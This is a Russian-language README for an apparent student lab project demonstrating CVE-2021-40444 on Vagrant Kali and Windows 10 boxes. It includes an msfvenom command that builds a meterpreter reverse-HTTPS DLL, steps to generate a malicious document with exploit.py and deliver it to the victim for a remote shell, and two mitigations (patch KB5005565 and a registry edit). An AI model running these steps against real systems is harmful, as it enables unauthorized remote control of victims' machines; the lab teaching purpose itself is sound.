TIC4301_Project
Проект TIC4301 - CVE-2021-40444
Загрузите следующие vagrant-боксы:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
Импортируйте боксы следующими командами через vagrant:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
Настройка (win10):
- В боксе win10 войдите как администратор с паролем vagrant.
- Щёлкните правой кнопкой мыши по script.ps1 на рабочем столе и запустите через powershell. (Оставьте это окно открытым)
- Запустите ipconfig.exe и получите адрес этого узла.
Настройка (Kali):
- cd Desktop/CVE-2021-40444.
- сгенерируйте вашу вредоносную DLL с помощью msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- запустите listener в metasploit.
- сгенерируйте вредоносный документ. # python3 exploit.py generate test/calc.dll http://
- перейдите по адресу http://<win 10 IP>/upload и загрузите файл.
- ожидайте получения shell.
Меры защиты:
- Установите исправление KB5005565.
- Отредактируйте реестр Windows с помощью patch.reg из репозитория.